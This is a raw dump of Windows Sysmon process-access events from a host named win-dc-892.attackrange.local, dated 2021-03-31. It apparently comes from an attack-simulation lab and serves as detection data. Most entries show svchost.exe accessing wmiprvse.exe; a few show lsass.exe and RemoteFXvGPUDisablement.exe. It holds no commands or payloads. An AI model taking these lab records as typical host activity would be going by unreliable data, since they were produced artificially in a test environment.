12:00:50.518{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-6471-6064-2200-00000000AE01}2836C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001455Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:50.518{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-6471-6064-2200-00000000AE01}2836C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001454Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:00:50.518{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-6471-6064-2200-00000000AE01}2836C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001453Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:50.518{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-6471-6064-2200-00000000AE01}2836C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001452Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:00:50.502{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-6471-6064-2200-00000000AE01}2836C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001451Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:50.502{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-6471-6064-2200-00000000AE01}2836C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001450Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:00:50.502{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-6471-6064-2200-00000000AE01}2836C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001449Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:50.502{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-6471-6064-2200-00000000AE01}2836C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001448Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:00:50.502{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-6471-6064-2200-00000000AE01}2836C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001447Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:50.502{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-6471-6064-2200-00000000AE01}2836C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001446Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:00:50.487{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-6471-6064-2200-00000000AE01}2836C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001445Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:50.487{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-6471-6064-2200-00000000AE01}2836C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001444Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:00:50.487{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-6471-6064-2200-00000000AE01}2836C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001443Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:50.487{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-6471-6064-2200-00000000AE01}2836C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001442Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:00:50.487{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-6471-6064-2200-00000000AE01}2836C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001441Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:50.487{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-6471-6064-2200-00000000AE01}2836C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001440Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:00:50.471{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-6471-6064-2200-00000000AE01}2836C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001439Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:50.471{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-6471-6064-2200-00000000AE01}2836C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001438Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:00:50.471{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-6471-6064-2200-00000000AE01}2836C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001437Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:50.424{266CAFBE-646A-6064-0B00-00000000AE01}856976C:\Windows\system32\lsass.exe{266CAFBE-646E-6064-1A00-00000000AE01}2284C:\Windows\System32\RemoteFXvGPUDisablement.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+24c07|C:\Windows\system32\lsasrv.dll+25d4d|C:\Windows\system32\lsasrv.dll+24a85|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001436Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:00:50.424{266CAFBE-646A-6064-0B00-00000000AE01}856976C:\Windows\system32\lsass.exe{266CAFBE-646E-6064-1A00-00000000AE01}2284C:\Windows\System32\RemoteFXvGPUDisablement.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\lsasrv.dll+249cd|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001435Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:50.409{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-6471-6064-2200-00000000AE01}2836C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001434Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:00:50.409{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-6471-6064-2200-00000000AE01}2836C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001433Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:50.409{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-6471-6064-2200-00000000AE01}2836C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001432Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
